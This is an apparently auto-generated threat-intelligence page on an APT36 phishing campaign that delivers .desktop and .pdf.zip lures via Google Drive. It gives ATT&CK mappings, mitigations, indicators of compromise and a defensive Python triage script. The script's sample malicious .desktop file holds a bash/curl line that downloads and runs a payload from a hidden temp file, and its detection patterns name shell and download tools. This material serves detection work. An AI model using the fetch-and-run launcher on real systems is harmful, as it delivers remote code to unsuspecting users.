
Investigation Report: APT36 Malware Campaign Using Desktop Entry Files and Google Drive Payload Delivery

Severity: Medium
Published: Fri Aug 22 2025 (08/22/2025, 00:00:00 UTC)
Source: CIRCL OSINT Feed
Vendor/Project: type
Product: osint


AI-Powered Analysis

Last updated: 08/22/2025, 17:48:20 UTC

Technical Analysis

This investigation report details a malware campaign attributed to the threat actor group APT36, also known as "Operation C-Major." The campaign uses phishing to deliver malicious payloads disguised as desktop entry files (.desktop) and compressed PDF files (.pdf.zip): phishing emails entice victims to open these attachments. Notably, the payloads are hosted on Google Drive, so delivery rides on a trusted cloud service and evades traditional detection controls that do not inspect such traffic.

The malware employs multiple tactics mapped to MITRE ATT&CK techniques, including scripting (T1064), masquerading (T1036), hidden files and directories (T1564.001), and the creation of malicious Windows services (T1543.003) for persistence. The campaign also involves brute force attempts (T1110) and software discovery (T1518) to expand access and perform reconnaissance within compromised environments. Network communications use both application layer protocols (T1071) and non-application layer protocols (T1095), sometimes over non-standard ports (T1571), which complicates network detection.

Indicators of compromise include domains such as "seemysitelive.store," associated IP addresses, WebSocket URLs, and multiple file hashes linked to the malicious payloads. The campaign's medium severity rating reflects its moderate impact potential and the complexity of exploitation, which requires user interaction (opening malicious attachments); no exploits in the wild or available patches are currently known. The threat actor's use of legitimate cloud services for payload delivery, combined with its evasion techniques, underscores the need for vigilant detection and response capabilities.

Potential Impact

For European organizations, this APT36 campaign poses a significant risk primarily through targeted phishing attacks that can lead to initial compromise and subsequent lateral movement within networks. Hosting the payload on Google Drive may bypass traditional email and web filtering solutions, increasing the likelihood of successful delivery. Once inside, the malware's ability to establish persistence via Windows services and hide its presence can lead to prolonged undetected access, data exfiltration, and potential espionage. The campaign's brute force and software discovery techniques could enable attackers to escalate privileges and map critical infrastructure, threatening the confidentiality and integrity of sensitive data. Disruption of availability is possible if the malware disables security controls or critical services. European organizations with remote workforces, or those heavily reliant on cloud services, may be particularly exposed. The medium severity suggests a moderate but credible threat to sectors such as government, defense, critical infrastructure, and enterprises handling sensitive procurement or operational data, especially where APT36 has a geopolitical interest in the target.

Mitigation Recommendations

To mitigate this threat effectively, European organizations should run targeted phishing awareness and training programs that emphasize the risks of opening unsolicited attachments, especially those with unusual file extensions such as .desktop or doubled extensions like .pdf.zip. Email security gateways should be configured to detect and block suspicious attachments and URLs, including links to cloud storage services such as Google Drive. Endpoint detection and response (EDR) solutions must be tuned to identify behaviors associated with scripting, masquerading, and unauthorized Windows service creation. Network monitoring should include anomaly detection for non-standard port usage and unusual WebSocket connections, such as those to the domain "seemysitelive.store." Multi-factor authentication (MFA) should be enforced to reduce the risk from brute force attacks. Regular audits of user privileges and software inventories can limit the attack surface and surface unauthorized changes. Incident response plans should include procedures for rapid containment and forensic analysis of phishing-related compromises. Additionally, organizations should participate in threat intelligence sharing platforms to stay current on emerging indicators and tactics related to APT36.
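The two detection points the report makes (a .desktop file masquerading as a PDF that fetches its payload from Google Drive, and network traffic to the listed C2 indicators) can be triaged with a small script. The following is an added example, not code from the report or from the CIRCL feed: it parses the [Desktop Entry] group of a .desktop file and flags the masquerading traits described above, and it matches DNS/proxy log lines against the report's domain, IP and WebSocket IoCs. The .desktop samples and log lines are constructed for the demo; the Google Drive host names and the Exec heuristics are assumptions, not indicators taken from the report.

```python
"""Triage helpers for the desktop-entry campaign described in the report above.

Added example, not code from the original report or its source feed. It
(1) parses a Linux .desktop file and flags masquerading/scripting traits and
(2) matches DNS/proxy log lines against the report's network IoCs.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Network IoCs copied from the report's Indicators of Compromise section.
IOC_DOMAINS = {"seemysitelive.store"}
IOC_IPS = {"164.215.103.55", "45.155.54.28"}
IOC_URLS = {"ws://seemysitelive.store:8080/ws"}

# Assumption: host names a Google Drive download link points at.
DRIVE_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}

DOC_DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?)\.desktop$", re.IGNORECASE)
DOC_LIKE_NAME = re.compile(r"\.(pdf|docx?|xlsx?)$", re.IGNORECASE)
SHELL_OR_FETCH = re.compile(r"\b(sh|bash|zsh|curl|wget|python3?|base64)\b")
HIDDEN_PATH = re.compile(r"/\.[\w-]+")          # dot-file component, e.g. /tmp/.cache
URL_IN_EXEC = re.compile(r"https?://[^\s\"']+")


@dataclass
class DesktopVerdict:
    path: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_desktop_entry(text: str) -> dict:
    """Return key=value pairs from the [Desktop Entry] group of a .desktop file."""
    entries, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip()] = value.strip()
    return entries


def triage_desktop_file(path: str, text: str) -> DesktopVerdict:
    """Flag a .desktop file that poses as a document and launches a downloader."""
    verdict = DesktopVerdict(path)
    if DOC_DOUBLE_EXT.search(path):
        verdict.reasons.append("document-style double extension (T1036)")
    entry = parse_desktop_entry(text)
    if DOC_LIKE_NAME.search(entry.get("Name", "")):
        verdict.reasons.append("Name field mimics a document (T1036)")
    exec_line = entry.get("Exec", "")
    if SHELL_OR_FETCH.search(exec_line):
        verdict.reasons.append("Exec invokes a shell or download tool (T1064)")
    if HIDDEN_PATH.search(exec_line):
        verdict.reasons.append("Exec uses a hidden dot-file path (T1564.001)")
    for url in URL_IN_EXEC.findall(exec_line):
        if (urlparse(url).hostname or "").lower() in DRIVE_HOSTS:
            verdict.reasons.append("Exec fetches a payload from Google Drive")
            break
    return verdict


def _whole_token(line: str, value: str) -> bool:
    """Whole-token match, so 45.155.54.28 is not found inside 145.155.54.28."""
    pattern = r"(?<![\w.-])" + re.escape(value) + r"(?![\w.-])"
    return re.search(pattern, line) is not None


def match_network_iocs(log_lines) -> dict:
    """Map each log line index to the sorted list of report IoCs it contains."""
    indicators = sorted(IOC_DOMAINS | IOC_IPS | IOC_URLS)
    hits = {}
    for i, line in enumerate(log_lines):
        found = [ioc for ioc in indicators if _whole_token(line, ioc)]
        if found:
            hits[i] = found
    return hits


# Constructed sample .desktop files (the Drive file id is a placeholder).
SUSPECT_PATH = "PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop"
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -sL 'https://drive.google.com/uc?export=download&id=FILE_ID_PLACEHOLDER' -o /tmp/.cache; sh /tmp/.cache"
"""
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.gedit
"""

# Constructed log lines; the first two mimic the report's WebSocket C2 traffic.
SAMPLE_LOGS = [
    "2025-08-22T10:01:12Z dns   host=ws1 qname=seemysitelive.store",
    "2025-08-22T10:01:13Z proxy host=ws1 dst=164.215.103.55:8080 url=ws://seemysitelive.store:8080/ws",
    "2025-08-22T10:02:00Z proxy host=ws2 dst=203.0.113.10:443 url=https://example.com/",
]

if __name__ == "__main__":
    verdict = triage_desktop_file(SUSPECT_PATH, SAMPLE_DESKTOP)
    print(verdict.path, "SUSPICIOUS" if verdict.suspicious else "clean", verdict.reasons)
    for idx, found in match_network_iocs(SAMPLE_LOGS).items():
        print(f"log line {idx}: {found}")
```

The .desktop checks are heuristics and will fire on some legitimate launchers that wrap a shell command, so treat a verdict as a triage signal for EDR review rather than a blocking rule; the IoC matcher, by contrast, uses whole-token matching on the report's exact values and is safe to run over proxy and DNS exports as-is.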


Technical Details

UUID: 957de389-e7a6-4e1b-87b3-a7b5e94d3c34
Original timestamp: 1755864522 (2025-08-22 12:08:42 UTC)

Indicators of Compromise

Domain
  seemysitelive.store

IP
  164.215.103.55
  45.155.54.28
  Description: seemysitelive.store: Enriched via the dns module

URL
  ws://seemysitelive.store:8080/ws

File
  PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.zip
  PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop

Hash (listed in MD5 / SHA-1 / SHA-256 triples, as identified by digest length)
  MD5      6ac0fe0fa5d9af8193610d710a7da63c
  SHA-1    3e3169c513c02126028480421fb341a167cb9fcd
  SHA-256  34ad45374d5f5059cad65e7057ec0f3e468f00234be7c34de033093efc4dd83d
  MD5      a484f85d132609a4a6b5ed65ece7d331
  SHA-1    1982f09bfab3a6688bb80249a079db1a759214b7
  SHA-256  6347f46d77a47b90789a1209b8f573b2529a6084f858a27d977bf23ee8a79113
  MD5      566ddd4eb4ca8d4dd67b72ee7f944055
  SHA-1    df4db969a69efc1db59f4d3c596ed590ee059777
  SHA-256  7a946339439eb678316a124b8d700b21de919c81ee5bef33e8cb848b7183927b

Threat ID: 68a8a9b3ad5a09ad0020bc3d

Added to database: 8/22/2025, 5:32:35 PM

Last enriched: 8/22/2025, 5:48:20 PM

Last updated: 8/23/2025, 1:29:25 AM

Views: 4
